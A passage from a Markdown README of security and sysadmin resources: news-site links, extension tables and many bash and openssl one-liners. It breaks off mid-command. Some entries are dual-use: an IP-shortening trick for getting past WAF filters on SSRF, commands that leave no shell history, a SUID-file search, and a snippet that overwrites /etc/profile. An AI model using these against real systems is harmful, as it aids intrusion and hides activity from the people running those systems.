&nbsp;&nbsp;:small_orange_diamond: <a href="https://latesthackingnews.com/"><b>Latest Hacking News</b></a> - provides the latest hacking news, exploits and vulnerabilities for ethical hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securitynewsletter.co/"><b>Security Newsletter</b></a> - security news as a weekly digest (email notifications).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://security.googleblog.com/"><b>Google Online Security Blog</b></a> - the latest news and insights from Google on security and safety on the Internet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.qualys.com/"><b>Qualys Blog</b></a> - expert network security guidance and news.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.darkreading.com/"><b>DARKReading</b></a> - connecting the Information Security Community.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.darknet.org.uk/"><b>Darknet</b></a> - latest hacking tools, hacker news, cybersecurity best practices, ethical hacking & pen-testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/disclosedh1"><b>publiclyDisclosed</b></a> - public disclosure watcher who keeps you up to date about the recently disclosed bugs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.reddit.com/r/hacking/"><b>Reddit - Hacking</b></a> - a subreddit dedicated to hacking and hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://packetstormsecurity.com/"><b>Packet Storm</b></a> - information security services, news, files, tools, exploits, advisories and whitepapers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sekurak.pl/"><b>Sekurak</b></a> - about security, penetration tests, vulnerabilities and many others (PL/EN).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nfsec.pl/"><b>nf.sec</b></a> - basic aspects and mechanisms of Linux operating system security (PL).<br> </p> ##### :black_small_square: Other/All-in-one <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://changelog.com/"><b>Changelog</b></a> - is a community of hackers; news & podcasts for developers and hackers.<br> </p> #### Other Cheat Sheets &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ###### Build your own DNS Servers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://calomel.org/unbound_dns.html"><b>Unbound DNS Tutorial</b></a> - a validating, recursive, and caching DNS server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ctrl.blog/entry/knot-dns-resolver-tutorial.html"><b>Knot Resolver on Fedora</b></a> - how to get faster and more secure DNS resolution with Knot Resolver on Fedora.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.aaflalo.me/2018/10/tutorial-setup-dns-over-https-server/"><b>DNS-over-HTTPS</b></a> - tutorial to setup your own DNS-over-HTTPS (DoH) server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hacks.mozilla.org/2018/05/a-cartoon-intro-to-dns-over-https/"><b>dns-over-https</b></a> - a cartoon intro to DNS over HTTPS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.aaflalo.me/2019/03/dns-over-tls/"><b>DNS-over-TLS</b></a> - following to your DoH server, setup your DNS-over-TLS (DoT) server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://zwischenzugs.com/2018/01/26/how-and-why-i-run-my-own-dns-servers/"><b>DNS Servers</b></a> - how (and why) i run my own DNS Servers.<br> </p> ###### Build your own Certificate Authority <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jamielinux.com/docs/openssl-certificate-authority/"><b>OpenSSL Certificate Authority</b></a> - build your own certificate authority (CA) using the OpenSSL tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/smallstep/certificates"><b>step-ca Certificate Authority</b></a> - build your own certificate authority (CA) using open source step-ca.<br> </p> ###### Build your own System/Virtual Machine <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/cfenollosa/os-tutorial"><b>os-tutorial</b></a> - how to create an OS from scratch.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://justinmeiners.github.io/lc3-vm/"><b>Write your Own Virtual Machine</b></a> - how to write your own virtual machine (VM).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/cirosantilli/x86-bare-metal-examples"><b>x86 Bare Metal Examples</b></a> - dozens of minimal operating systems to learn x86 system programming.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/djhworld/simple-computer"><b>simple-computer</b></a> - the scott CPU from "But How Do It Know?" by J. Clark Scott.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://littleosbook.github.io/"><b>littleosbook</b></a> - the little book about OS development.<br> </p> ###### DNS Servers list (privacy) | <b><u>IP</u></b> | <b><u>URL</u></b> | | :--- | :--- | | **`84.200.69.80`** | [dns.watch](https://dns.watch/) | | **`94.247.43.254`** | [opennic.org](https://www.opennic.org/) | | **`64.6.64.6`** | [verisign.com](https://www.verisign.com/en_US/security-services/public-dns/index.xhtml) | | **`89.233.43.71`** | [censurfridns.dk](https://blog.uncensoreddns.org/) | | **`1.1.1.1`** | [cloudflare.com](https://1.1.1.1/) | | **`94.130.110.185`** | [dnsprivacy.at](https://dnsprivacy.at/) | ###### TOP Browser extensions | <b><u>Extension name</u></b> | <b><u>Description</u></b> | | :--- | :--- | | **`IPvFoo`** | Display the server IP address and HTTPS information across all page elements. | | **`FoxyProxy`** | Simplifies configuring browsers to access proxy-servers. | | **`HTTPS Everywhere`** | Automatically use HTTPS security on many sites. | | **`uMatrix`** | Point & click to forbid/allow any class of requests made by your browser. | | **`uBlock Origin`** | An efficient blocker: easy on memory and CPU footprint. | | **`Session Buddy`** | Manage browser tabs and bookmarks with ease. | | **`SuperSorter`** | Sort bookmarks recursively, delete duplicates, merge folders, and more. | | **`Clear Cache`** | Clear your cache and browsing data. | | **`d3coder`** | Encoding/Decoding plugin for various types of encoding. | | **`Web Developer`** | Adds a toolbar button with various web developer tools. | | **`ThreatPinch Lookup`** | Add threat intelligence hover tool tips. | ###### TOP Burp extensions | <b><u>Extension name</u></b> | <b><u>Description</u></b> | | :--- | :--- | | **`Active Scan++`** | Extends Burp's active and passive scanning capabilities. | | **`Autorize`** | Automatically detects authorization enforcement. | | **`AuthMatrix`** | A simple matrix grid to define the desired levels of access privilege. | | **`Logger++`** | Logs requests and responses for all Burp tools in a sortable table. | | **`Bypass WAF`** | Adds headers useful for bypassing some WAF devices. | | **`JSON Beautifier`** | Beautifies JSON content in the HTTP message viewer. | | **`JSON Web Tokens`** | Enables Burp to decode and manipulate JSON web tokens. | | **`CSP Auditor`** | Displays CSP headers for responses, and passively reports CSP weaknesses. | | **`CSP-Bypass`** | Passively scans for CSP headers that contain known bypasses. | | **`Hackvertor`** | Converts data using a tag-based configuration to apply various encoding. | | **`HTML5 Auditor`** | Scans for usage of risky HTML5 features. | | **`Software Vulnerability Scanner`** | Vulnerability scanner based on vulners.com audit API. | | **`Turbo Intruder`** | Is a powerful bruteforcing tool. | | **`Upload Scanner`** | Upload a number of different file types, laced with different forms of payload. | ###### Hack Mozilla Firefox address bar In Firefox's address bar, you can limit results by typing special characters before or after your term: - `^` - for matches in your browsing history - `*` - for matches in your bookmarks. - `%` - for matches in your currently open tabs. - `#` - for matches in page titles. - `@` - for matches in web addresses. ###### Chrome hidden commands - `chrome://chrome-urls` - list of all commands - `chrome://flags` - enable experiments and development features - `chrome://interstitials` - errors and warnings - `chrome://net-internals` - network internals (events, dns, cache) - `chrome://network-errors` - network errors - `chrome://net-export` - start logging future network activity to a file - `chrome://safe-browsing` - safe browsing options - `chrome://user-actions` - record all user actions - `chrome://restart` - restart chrome - `chrome://dino` - ERR_INTERNET_DISCONNECTED... - `cache:<website-address>` - view the cached version of the web page ###### Bypass WAFs by Shortening IP Address (by [0xInfection](https://twitter.com/0xInfection)) IP addresses can be shortened by dropping the zeroes: ``` http://1.0.0.1 โ†’ http://1.1 http://127.0.0.1 โ†’ http://127.1 http://192.168.0.1 โ†’ http://192.168.1 http://0xC0A80001 or http://3232235521 โ†’ 192.168.0.1 http://192.168.257 โ†’ 192.168.1.1 http://192.168.516 โ†’ 192.168.2.4 ``` > This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted. For more information please see [How to Obscure Any URL](http://www.pc-help.org/obscure.htm) and [Magic IP Address Shortcuts](https://stuff-things.net/2014/09/25/magic-ip-address-shortcuts/). ###### Hashing, encryption and encoding (by [Michal ล paฤek](https://twitter.com/spazef0rze)) _Hashing_ plaintext :arrow_right: hash<br> hash :no_entry: plaintext _Symmetric encryption_ plaintext :arrow_right: :key: :arrow_right: ciphertext<br> plaintext :arrow_left: :key: :arrow_left: ciphertext<br> (:key: shared key) _Asymmetric encryption_ plaintext :arrow_right: :key: :arrow_right: ciphertext<br> plaintext :arrow_left: :part_alternation_mark: :arrow_left: ciphertext<br> (:key: public key, :part_alternation_mark: private key)<br> _Encoding_ text :arrow_right: encoded<br> text :arrow_left: encoded #### One-liners &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### Table of Contents * [terminal](#tool-terminal) * [busybox](#tool-busybox) * [mount](#tool-mount) * [fuser](#tool-fuser) * [lsof](#tool-lsof) * [ps](#tool-ps) * [top](#tool-top) * [vmstat](#tool-vmstat) * [iostat](#tool-iostat) * [strace](#tool-strace) * [kill](#tool-kill) * [find](#tool-find) * [diff](#tool-diff) * [vimdiff](#tool-vimdiff) * [tail](#tool-tail) * [cpulimit](#tool-cpulimit) * [pwdx](#tool-pwdx) * [tr](#tool-tr) * [chmod](#tool-chmod) * [who](#tool-who) * [last](#tool-last) * [screen](#tool-screen) * [script](#tool-script) * [du](#tool-du) * [inotifywait](#tool-inotifywait) * [openssl](#tool-openssl) * [secure-delete](#tool-secure-delete) * [dd](#tool-dd) * [gpg](#tool-gpg) * [system-other](#tool-system-other) * [curl](#tool-curl) * [httpie](#tool-httpie) * [ssh](#tool-ssh) * [linux-dev](#tool-linux-dev) * [tcpdump](#tool-tcpdump) * [tcpick](#tool-tcpick) * [ngrep](#tool-ngrep) * [hping3](#tool-hping3) * [nmap](#tool-nmap) * [netcat](#tool-netcat) * [socat](#tool-socat) * [p0f](#tool-p0f) * [gnutls-cli](#tool-gnutls-cli) * [netstat](#tool-netstat) * [rsync](#tool-rsync) * [host](#tool-host) * [dig](#tool-dig) * [certbot](#tool-certbot) * [network-other](#tool-network-other) * [git](#tool-git) * [awk](#tool-awk) * [sed](#tool-sed) * [grep](#tool-grep) * [perl](#tool-perl) ##### Tool: [terminal](https://en.wikipedia.org/wiki/Linux_console) ###### Reload shell without exit ```bash exec $SHELL -l ``` ###### Close shell keeping all subprocess running ```bash disown -a && exit ``` ###### Exit without saving shell history ```bash kill -9 $$ unset HISTFILE && exit ``` ###### Perform a branching conditional ```bash true && echo success false || echo failed ``` ###### Pipe stdout and stderr to separate commands ```bash some_command > >(/bin/cmd_for_stdout) 2> >(/bin/cmd_for_stderr) ``` ###### Redirect stdout and stderr each to separate files and print both to the screen ```bash (some_command 2>&1 1>&3 | tee errorlog ) 3>&1 1>&2 | tee stdoutlog ``` ###### List of commands you use most often ```bash history | \ awk '{CMD[$2]++;count++;}END { for (a in CMD)print CMD[a] " " CMD[a]/count*100 "% " a;}' | \ grep -v "./" | \ column -c3 -s " " -t | \ sort -nr | nl | head -n 20 ``` ###### Sterilize bash history ```bash function sterile() { history | awk '$2 != "history" { $1=""; print $0 }' | egrep -vi "\ curl\b+.*(-E|--cert)\b+.*\b*|\ curl\b+.*--pass\b+.*\b*|\ curl\b+.*(-U|--proxy-user).*:.*\b*|\ curl\b+.*(-u|--user).*:.*\b* .*(-H|--header).*(token|auth.*)\b+.*|\ wget\b+.*--.*password\b+.*\b*|\ http.?://.+:.+@.*\ " > $HOME/histbuff; history -r $HOME/histbuff; } export PROMPT_COMMAND="sterile" ``` > Look also: [A naive utility to censor credentials in command history](https://github.com/lbonanomi/go/blob/master/revisionist.go). ###### Quickly backup a file ```bash cp filename{,.orig} ``` ###### Empty a file (truncate to 0 size) ```bash >filename ``` ###### Delete all files in a folder that don't match a certain file extension ```bash rm !(*.foo|*.bar|*.baz) ``` ###### Pass multi-line string to a file ```bash # cat >filename ... - overwrite the file # cat >>filename ... - append to a file cat > filename << __EOF__ data data data __EOF__ ``` ###### Edit a file on a remote host using vim ```bash vim scp://user@host//etc/fstab ``` ###### Create a directory and change into it at the same time ```bash mkd() { mkdir -p "$@" && cd "$@"; } ``` ###### Convert uppercase files to lowercase files ```bash rename 'y/A-Z/a-z/' * ``` ###### Print a row of characters across the terminal ```bash printf "%`tput cols`s" | tr ' ' '#' ``` ###### Show shell history without line numbers ```bash history | cut -c 8- fc -l -n 1 | sed 's/^\s*//' ``` ###### Run command(s) after exit session ```bash cat > /etc/profile << __EOF__ _after_logout() { username=$(whoami) for _pid in $(ps afx | grep sshd | grep "$username" | awk '{print $1}') ; do kill -9 $_pid done } trap _after_logout EXIT __EOF__ ``` ###### Generate a sequence of numbers ```bash for ((i=1; i<=10; i+=2)) ; do echo $i ; done # alternative: seq 1 2 10 for ((i=5; i<=10; ++i)) ; do printf '%02d\n' $i ; done # alternative: seq -w 5 10 for i in {1..10} ; do echo $i ; done ``` ###### Simple Bash filewatching ```bash unset MAIL; export MAILCHECK=1; export MAILPATH='$FILE_TO_WATCH?$MESSAGE' ``` --- ##### Tool: [busybox](https://www.busybox.net/) ###### Static HTTP web server ```bash busybox httpd -p $PORT -h $HOME [-c httpd.conf] ``` ___ ##### Tool: [mount](https://en.wikipedia.org/wiki/Mount_(Unix)) ###### Mount a temporary ram partition ```bash mount -t tmpfs tmpfs /mnt -o size=64M ``` * `-t` - filesystem type * `-o` - mount options ###### Remount a filesystem as read/write ```bash mount -o remount,rw / ``` ___ ##### Tool: [fuser](https://en.wikipedia.org/wiki/Fuser_(Unix)) ###### Show which processes use the files/directories ```bash fuser /var/log/daemon.log fuser -v /home/supervisor ``` ###### Kills a process that is locking a file ```bash fuser -ki filename ``` * `-i` - interactive option ###### Kills a process that is locking a file with specific signal ```bash fuser -k -HUP filename ``` * `--list-signals` - list available signal names ###### Show what PID is listening on specific port ```bash fuser -v 53/udp ``` ###### Show all processes using the named filesystems or block device ```bash fuser -mv /var/www ``` ___ ##### Tool: [lsof](https://en.wikipedia.org/wiki/Lsof) ###### Show process that use internet connection at the moment ```bash lsof -P -i -n ``` ###### Show process that use specific port number ```bash lsof -i tcp:443 ``` ###### Lists all listening ports together with the PID of the associated process ```bash lsof -Pan -i tcp -i udp ``` ###### List all open ports and their owning executables ```bash lsof -i -P | grep -i "listen" ``` ###### Show all open ports ```bash lsof -Pnl -i ``` ###### Show open ports (LISTEN) ```bash lsof -Pni4 | grep LISTEN | column -t ``` ###### List all files opened by a particular command ```bash lsof -c "process" ``` ###### View user activity per directory ```bash lsof -u username -a +D /etc ``` ###### Show 10 largest open files ```bash lsof / | \ awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | \ sort -n -u | tail | column -t ``` ###### Show current working directory of a process ```bash lsof -p <PID> | grep cwd ``` ___ ##### Tool: [ps](https://en.wikipedia.org/wiki/Ps_(Unix)) ###### Show a 4-way scrollable process tree with full details ```bash ps awwfux | less -S ``` ###### Processes per user counter ```bash ps hax -o user | sort | uniq -c | sort -r ``` ###### Show all processes by name with main header ```bash ps -lfC nginx ``` ___ ##### Tool: [find](https://en.wikipedia.org/wiki/Find_(Unix)) ###### Find files that have been modified on your system in the past 60 minutes ```bash find / -mmin 60 -type f ``` ###### Find all files larger than 20M ```bash find / -type f -size +20M ``` ###### Find duplicate files (based on MD5 hash) ```bash find -type f -exec md5sum '{}' ';' | sort | uniq --all-repeated=separate -w 33 ``` ###### Change permission only for files ```bash cd /var/www/site && find . -type f -exec chmod 766 {} \; cd /var/www/site && find . -type f -exec chmod 664 {} + ``` ###### Change permission only for directories ```bash cd /var/www/site && find . -type d -exec chmod g+x {} \; cd /var/www/site && find . -type d -exec chmod g+rwx {} + ``` ###### Find files and directories for specific user/group ```bash # User: find . -user <username> -print find /etc -type f -user <username> -name "*.conf" # Group: find /opt -group <group> find /etc -type f -group <group> -iname "*.conf" ``` ###### Find files and directories for all without specific user/group ```bash # User: find . \! -user <username> -print # Group: find . \! -group <group> ``` ###### Looking for files/directories that only have certain permission ```bash # User find . -user <username> -perm -u+rw # -rw-r--r-- find /home -user $(whoami) -perm 777 # -rwxrwxrwx # Group: find /home -type d -group <group> -perm 755 # -rwxr-xr-x ``` ###### Delete older files than 60 days ```bash find . -type f -mtime +60 -delete ``` ###### Recursively remove all empty sub-directories from a directory ```bash find . -depth -type d -empty -exec rmdir {} \; ``` ###### How to find all hard links to a file ```bash find </path/to/dir> -xdev -samefile filename ``` ###### Recursively find the latest modified files ```bash find . -type f -exec stat --format '%Y :%y %n' "{}" \; | sort -nr | cut -d: -f2- | head ``` ###### Recursively find/replace of a string with sed ```bash find . -not -path '*/\.git*' -type f -print0 | xargs -0 sed -i 's/foo/bar/g' ``` ###### Recursively find/replace of a string in directories and file names ```bash find . -depth -name '*test*' -execdir bash -c 'mv -v "$1" "${1//foo/bar}"' _ {} \; ``` ###### Recursively find suid executables ```bash find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \; ``` ___ ##### Tool: [top](https://en.wikipedia.org/wiki/Top_(software)) ###### Use top to monitor only all processes with the specific string ```bash top -p $(pgrep -d , <str>) ``` * `<str>` - process containing string (eg. nginx, worker) ___ ##### Tool: [vmstat](https://en.wikipedia.org/wiki/Vmstat) ###### Show current system utilization (fields in kilobytes) ```bash vmstat 2 20 -t -w ``` * `2` - number of times with a defined time interval (delay) * `20` - each execution of the command (count) * `-t` - show timestamp * `-w` - wide output * `-S M` - output of the fields in megabytes instead of kilobytes ###### Show current system utilization will get refreshed every 5 seconds ```bash vmstat 5 -w ``` ###### Display report a summary of disk operations ```bash vmstat -D ``` ###### Display report of event counters and memory stats ```bash vmstat -s ``` ###### Display report about kernel objects stored in slab layer cache ```bash vmstat -m ``` ##### Tool: [iostat](https://en.wikipedia.org/wiki/Iostat) ###### Show information about the CPU usage, and I/O statistics about all the partitions ```bash iostat 2 10 -t -m ``` * `2` - number of times with a defined time interval (delay) * `10` - each execution of the command (count) * `-t` - show timestamp * `-m` - fields in megabytes (`-k` - in kilobytes, default) ###### Show information only about the CPU utilization ```bash iostat 2 10 -t -m -c ``` ###### Show information only about the disk utilization ```bash iostat 2 10 -t -m -d ``` ###### Show information only about the LVM utilization ```bash iostat -N ``` ___ ##### Tool: [strace](https://en.wikipedia.org/wiki/Strace) ###### Track with child processes ```bash # 1) strace -f -p $(pidof glusterfsd) # 2) strace -f $(pidof php-fpm | sed 's/\([0-9]*\)/\-p \1/g') ``` ###### Track process with 30 seconds limit ```bash timeout 30 strace $(< /var/run/zabbix/zabbix_agentd.pid) ``` ###### Track processes and redirect output to a file ```bash ps auxw | grep '[a]pache' | awk '{print " -p " $2}' | \ xargs strace -o /tmp/strace-apache-proc.out ``` ###### Track with print time spent in each syscall and limit length of print strings ```bash ps auxw | grep '[i]init_policy' | awk '{print " -p " $2}' | \ xargs strace -f -e trace=network -T -s 10000 ``` ###### Track the open request of a network port ```bash strace -f -e trace=bind nc -l 80 ``` ###### Track the open request of a network port (show TCP/UDP) ```bash strace -f -e trace=network nc -lu 80 ``` ___ ##### Tool: [kill](https://en.wikipedia.org/wiki/Kill_(command)) ###### Kill a process running on port ```bash kill -9 $(lsof -i :<port> | awk '{l=$2} END {print l}') ``` ___ ##### Tool: [diff](https://en.wikipedia.org/wiki/Diff) ###### Compare two directory trees ```bash diff <(cd directory1 && find | sort) <(cd directory2 && find | sort) ``` ###### Compare output of two commands ```bash diff <(cat /etc/passwd) <(cut -f2 /etc/passwd) ``` ___ ##### Tool: [vimdiff](http://vimdoc.sourceforge.net/htmldoc/diff.html) ###### Highlight the exact differences, based on characters and words ```bash vimdiff file1 file2 ``` ###### Compare two JSON files ```bash vimdiff <(jq -S . A.json) <(jq -S . B.json) ``` ###### Compare Hex dump ```bash d(){ vimdiff <(f $1) <(f $2);};f(){ hexdump -C $1|cut -d' ' -f3-|tr -s ' ';}; d ~/bin1 ~/bin2 ``` ###### diffchar Save [diffchar](https://raw.githubusercontent.com/vim-scripts/diffchar.vim/master/plugin/diffchar.vim) @ `~/.vim/plugins` Click `F7` to switch between diff modes Usefull `vimdiff` commands: * `qa` to exit all windows * `:vertical resize 70` to resize window * set window width `Ctrl+W [N columns]+(Shift+)<\>` ___ ##### Tool: [tail](https://en.wikipedia.org/wiki/Tail_(Unix)) ###### Annotate tail -f with timestamps ```bash tail -f file | while read ; do echo "$(date +%T.%N) $REPLY" ; done ``` ###### Analyse an Apache access log for the most common IP addresses ```bash tail -10000 access_log | awk '{print $1}' | sort | uniq -c | sort -n | tail ``` ###### Analyse web server log and show only 5xx http codes ```bash tail -n 100 -f /path/to/logfile | grep "HTTP/[1-2].[0-1]\" [5]" ``` ___ ##### Tool: [tar](https://en.wikipedia.org/wiki/Tar_(computing)) ###### System backup with exclude specific directories ```bash cd / tar -czvpf /mnt/system$(date +%d%m%Y%s).tgz --directory=/ \ --exclude=proc/* --exclude=sys/* --exclude=dev/* --exclude=mnt/* . ``` ###### System backup with exclude specific directories (pigz) ```bash cd / tar cvpf /backup/snapshot-$(date +%d%m%Y%s).tgz --directory=/ \ --exclude=proc/* --exclude=sys/* --exclude=dev/* \ --exclude=mnt/* --exclude=tmp/* --use-compress-program=pigz . ``` ___ ##### Tool: [dump](https://en.wikipedia.org/wiki/Dump_(program)) ###### System backup to file ```bash dump -y -u -f /backup/system$(date +%d%m%Y%s).lzo / ``` ###### Restore system from lzo file ```bash cd / restore -rf /backup/system$(date +%d%m%Y%s).lzo ``` ___ ##### Tool: [cpulimit](http://cpulimit.sourceforge.net/) ###### Limit the cpu usage of a process ```bash cpulimit -p pid -l 50 ``` ___ ##### Tool: [pwdx](https://www.cyberciti.biz/faq/unix-linux-pwdx-command-examples-usage-syntax/) ###### Show current working directory of a process ```bash pwdx <pid> ``` ___ ##### Tool: [taskset](https://www.cyberciti.biz/faq/taskset-cpu-affinity-command/) ###### Start a command on only one CPU core ```bash taskset -c 0 <command> ``` ___ ##### Tool: [tr](https://en.wikipedia.org/wiki/Tr_(Unix)) ###### Show directories in the PATH, one per line ```bash tr : '\n' <<<$PATH ``` ___ ##### Tool: [chmod](https://en.wikipedia.org/wiki/Chmod) ###### Remove executable bit from all files in the current directory ```bash chmod -R -x+X * ``` ###### Restore permission for /bin/chmod ```bash # 1: cp /bin/ls chmod.01 cp /bin/chmod chmod.01 ./chmod.01 700 file # 2: /bin/busybox chmod 0700 /bin/chmod # 3: setfacl --set u::rwx,g::---,o::--- /bin/chmod ``` ___ ##### Tool: [who](https://en.wikipedia.org/wiki/Who_(Unix)) ###### Find last reboot time ```bash who -b ``` ###### Detect a user sudo-su'd into the current shell ```bash [[ $(who -m | awk '{ print $1 }') == $(whoami) ]] || echo "You are su-ed to $(whoami)" ``` ___ ##### Tool: [last](https://www.howtoforge.com/linux-last-command/) ###### Was the last reboot a panic? ```bash (last -x -f $(ls -1t /var/log/wtmp* | head -2 | tail -1); last -x -f /var/log/wtmp) | \ grep -A1 reboot | head -2 | grep -q shutdown && echo "Expected reboot" || echo "Panic reboot" ``` ___ ##### Tool: [screen](https://en.wikipedia.org/wiki/GNU_Screen) ###### Start screen in detached mode ```bash screen -d -m <command> ``` ###### Attach to an existing screen session ```bash screen -r -d <pid> ``` ___ ##### Tool: [script](https://en.wikipedia.org/wiki/Script_(Unix)) ###### Record and replay terminal session ```bash ### Record session # 1) script -t 2>~/session.time -a ~/session.log # 2) script --timing=session.time session.log ### Replay session scriptreplay --timing=session.time session.log ``` ___ ##### Tool: [du](https://en.wikipedia.org/wiki/GNU_Screen) ###### Show 20 biggest directories with 'K M G' ```bash du | \ sort -r -n | \ awk '{split("K M G",v); s=1; while($1>1024){$1/=1024; s++} print int($1)" "v[s]"\t"$2}' | \ head -n 20 ``` ___ ##### Tool: [inotifywait](https://en.wikipedia.org/wiki/GNU_Screen) ###### Init tool everytime a file in a directory is modified ```bash while true ; do inotifywait -r -e MODIFY dir/ && ls dir/ ; done; ``` ___ ##### Tool: [openssl](https://www.openssl.org/) ###### Testing connection to the remote host ```bash echo | openssl s_client -connect google.com:443 -showcerts ``` ###### Testing connection to the remote host (debug mode) ```bash echo | openssl s_client -connect google.com:443 -showcerts -tlsextdebug -status ``` ###### Testing connection to the remote host (with SNI support) ```bash echo | openssl s_client -showcerts -servername google.com -connect google.com:443 ``` ###### Testing connection to the remote host with specific ssl version ```bash openssl s_client -tls1_2 -connect google.com:443 ``` ###### Testing connection to the remote host with specific ssl cipher ```bash openssl s_client -cipher 'AES128-SHA' -connect google.com:443 ``` ###### Verify 0-RTT ```bash _host="example.com" cat > req.in << __EOF__ HEAD / HTTP/1.1 Host: $_host Connection: close __EOF__ openssl s_client -connect ${_host}:443 -tls1_3 -sess_out session.pem -ign_eof < req.in openssl s_client -connect ${_host}:443 -tls1_3 -sess_in session.pem -early_data req.in ``` ###### Generate private key without passphrase ```bash # _len: 2048, 4096 ( _fd="private.key" ; _len="2048" ; \ openssl genrsa -out ${_fd} ${_len} ) ``` ###### Generate private key with passphrase ```bash # _ciph: des3, aes128, aes256 # _len: 2048, 4096 ( _ciph="aes128" ; _fd="private.key" ; _len="2048" ; \ openssl genrsa -${_ciph} -out ${_fd} ${_len} ) ``` ###### Remove passphrase from private key ```bash ( _fd="private.key" ; _fd_unp="private_unp.key" ; \ openssl rsa -in ${_fd} -out ${_fd_unp} ) ``` ###### Encrypt existing private key with a passphrase ```bash # _ciph: des3, aes128, aes256 ( _ciph="aes128" ; _fd="private.key" ; _fd_pass="private_pass.key" ; \ openssl rsa -${_ciph} -in ${_fd} -out ${_fd_pass} ``` ###### Check private key ```bash ( _fd="private.key" ; \ openssl rsa -check -in ${_fd} ) ``` ###### Get public key from private key ```bash ( _fd="private.key" ; _fd_pub="public.key" ; \ openssl rsa -pubout -in ${_fd} -out ${_fd_pub} ) ``` ###### Generate private key and CSR ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; _len="2048" ; \ openssl req -out ${_fd_csr} -new -newkey rsa:${_len} -nodes -keyout ${_fd} ) ``` ###### Generate CSR ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; \ openssl req -out ${_fd_csr} -new -key ${_fd} ) ``` ###### Generate CSR (metadata from existing certificate) > Where `private.key` is the existing private key. As you can see you do not generate this CSR from your certificate (public key). Also you do not generate the "same" CSR, just a new one to request a new certificate. ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; _fd_crt="cert.crt" ; \ openssl x509 -x509toreq -in ${_fd_crt} -out ${_fd_csr} -signkey ${_fd} ) ``` ###### Generate CSR with -config param ```bash ( _fd="private.key" ; _fd_csr="request.csr" ; \ openssl req -new -sha256 -key ${_fd} -out ${_fd_csr} \ -config <( cat << __EOF__ [req] default_bits = 2048 default_md = sha256 prompt = no distinguished_name = dn req_extensions = req_ext [ dn ] C = "<two-letter ISO abbreviation for your country>" ST = "<state or province where your organisation is legally located>" L = "<city where your organisation is legally located>" O = "<legal name of your organisation>" OU = "<section of the organisation>" CN = "<fully qualified domain name>" [ req_ext ] subjectAltName = @alt_names [ alt_names ] DNS.1 = <fully qualified domain name> DNS.2 = <next domain> DNS.3 = <next domain> __EOF__ )) ``` Other values in `[ dn ]`: ``` countryName = "DE" # C= stateOrProvinceName = "Hessen" # ST= localityName = "Keller" # L= postalCode = "424242" # L/postalcode= postalAddress = "Keller" # L/postaladdress= streetAddress = "Crater 1621" # L/street= organizationName = "apfelboymschule" # O= organizationalUnitName = "IT Department" # OU= commonName = "example.com" # CN= emailAddress = "[email protected]" # CN/emailAddress= ``` Example of `oids` (you'll probably also have to make OpenSSL know about the new fields required for EV by adding the following under `[new_oids]`): ``` [req] ... oid_section = new_oids [ new_oids ] postalCode = 2.5.4.17 streetAddress = 2.5.4.9 ``` For more information please look at these great explanations: - [RFC 5280](https://tools.ietf.org/html/rfc5280) - [How to create multidomain certificates using config files](https://apfelboymchen.net/gnu/notes/openssl%20multidomain%20with%20config%20files.html) - [Generate a multi domains certificate using config files](https://gist.github.com/romainnorberg/464758a6620228b977212a3cf20c3e08) - [Your OpenSSL CSR command is out of date](https://expeditedsecurity.com/blog/openssl-csr-command/) - [OpenSSL example configuration file](https://www.tbs-certificats.com/openssl-dem-server-cert.cnf) ###### List available EC curves ```bash openssl ecparam -list_curves ``` ###### Print ECDSA private and public keys ```bash ( _fd="private.key" ; \ openssl ec -in ${_fd} -noout -text ) # For x25519 only extracting public key ( _fd="private.key" ; _fd_pub="public.key" ; \ openssl pkey -in ${_fd} -pubout -out ${_fd_pub} ) ``` ###### Generate ECDSA private key ```bash # _curve: prime256v1, secp521r1, secp384r1 ( _fd="private.key" ; _curve="prime256v1" ; \ openssl ecparam -out ${_fd} -name ${_curve} -genkey ) # _curve: X25519 ( _fd="private.key" ; _curve="x25519" ; \ openssl genpkey -algorithm ${_curve} -out ${_fd} ) ``` ###### Generate private key and CSR (ECC) ```bash # _curve: prime256v1, secp521r1, secp384r1 ( _fd="domain.com.key" ; _fd_csr="domain.com.csr" ; _curve="prime256v1" ; \ openssl ecparam -out ${_fd} -name ${_curve} -genkey ; \ openssl req -new -key ${_fd} -out ${_fd_csr} -sha256 ) ``` ###### Generate self-signed certificate ```bash # _len: 2048, 4096 ( _fd="domain.key" ; _fd_out="domain.crt" ; _len="2048" ; _days="365" ; \ openssl req -newkey rsa:${_len} -nodes \ -keyout ${_fd} -x509 -days ${_days} -out ${_fd_out} ) ``` ###### Generate self-signed certificate from existing private key ```bash # _len: 2048, 4096 ( _fd="domain.key" ; _fd_out="domain.crt" ; _days="365" ; \ openssl req -key ${_fd} -nodes \ -x509 -days ${_days} -out 